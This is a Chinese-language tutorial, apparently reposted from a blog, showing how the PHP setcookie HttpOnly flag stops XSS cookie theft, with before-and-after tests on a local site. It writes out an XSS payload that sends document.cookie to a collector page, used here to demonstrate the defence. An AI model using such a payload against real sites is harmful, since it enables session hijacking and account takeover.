cookie设置httponly属性防御XSS***

时间  2020-01-28
标签 cookie 设置 httponly 属性 防御 xss 栏目 HTML 繁體版
原文   原文链接

***者利用XSS漏洞获取cookie或者session劫持,若是这里面包含了大量敏感信息(身份信息,管理员信息)等,***这里用获取的COOKIE登录帐号,并进行非法操做。php

COOKIE设置httponly属性能够化解XSS漏洞***带来的窃取cookie的危害。cookie


PHP中COOKIE设置方法:
session

<?php xss

 setcookie("xsstest", "xsstest", time()+3600, "/", "", false, false);ide

?>测试

最后一个字段false是为不设置httponly属性,true为已设置httponly属性。spa


测试内容:3d

本次测试环境,搭建一个包含XSS漏洞的php环境。日志

地址:http://localhost/home.php orm

如图所示:

wKioL1hsi9ThLJtKAAARVf5-0l0104.jpg

存在xss漏洞,获取cookie的代码为:

<script>document.location = 'http://localhost/cookie_collect.php?cookie=' + document.cookie;</script>


获取COOKIE的页面为:http://localhost/cookie_collect.php

如图所示:

wKioL1hsjB7g21ICAAAm-wm7SP8097.jpg


测试01

未设置httponly属性,cookie设置为:

<?php 

 setcookie("xsstest", "xsstest", time()+3600, "/", "", false, false);

?>

测试结果:

获取到cookie的内容,如图所示:

wKioL1hsjP_T7w7uAAAvmccWZaY149.jpg-wh_50

访问日志内容为:

wKiom1hsjYLiS_JJAABGWiXDlus217.jpg-wh_50

测试结果:利用跨站漏洞能够获取cookie内容。

测试02

设置httponly属性,cookie设置为:

<?php 

 setcookie("xsstest", "xsstest", time()+3600, "/", "", false, true);

?>

测试结果:

未获取到cookie的内容,如图所示:

wKiom1hsjmfwzf0NAAAgFJQssXg106.jpg-wh_50

访问日志内容为:

wKiom1hsjr3Ci9D1AAAuMBXMc7c721.jpg-wh_50

测试结果:利用跨站漏洞不可以获取cookie内容。

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程